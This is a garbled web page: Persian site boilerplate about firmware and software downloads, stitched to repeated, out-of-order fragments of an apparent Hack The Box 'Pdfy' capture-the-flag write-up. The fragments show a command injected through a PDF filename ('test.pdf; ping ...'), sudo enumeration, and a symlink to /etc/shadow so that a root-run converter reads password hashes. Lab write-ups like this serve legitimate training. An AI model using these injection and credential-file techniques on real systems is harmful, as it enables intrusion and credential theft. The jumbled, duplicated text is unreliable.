- 16 نوشته
- 159 محصول
- 0 کامنت
- 60 کاربر
درباره سایت
Firmware & Software & EMMC & TV.UPDATE & PDF
شبکه های اجتماعی
نماد اعتماد
mv test.pdf "test.pdf; ping -c 4 10.10.14.XX" Upload the file. A ping request is received on attacker machine → command injection confirmed. Rename PDF to:
sudo -l User www-data can run /usr/local/bin/pdfy as root without password. Running /usr/local/bin/pdfy asks for a PDF filename and converts it. It uses a system call to pdftotext – but with no sanitization. Exploitation Create a symlink to /etc/shadow as a PDF: Pdfy Htb Writeup
Directory scan:
ln -s /etc/shadow shadow.pdf Run:
mv test.pdf "test.pdf; ping -c 4 10.10.14.XX" Upload the file. A ping request is received on attacker machine → command injection confirmed. Rename PDF to:
sudo -l User www-data can run /usr/local/bin/pdfy as root without password. Running /usr/local/bin/pdfy asks for a PDF filename and converts it. It uses a system call to pdftotext – but with no sanitization. Exploitation Create a symlink to /etc/shadow as a PDF:
Directory scan:
ln -s /etc/shadow shadow.pdf Run: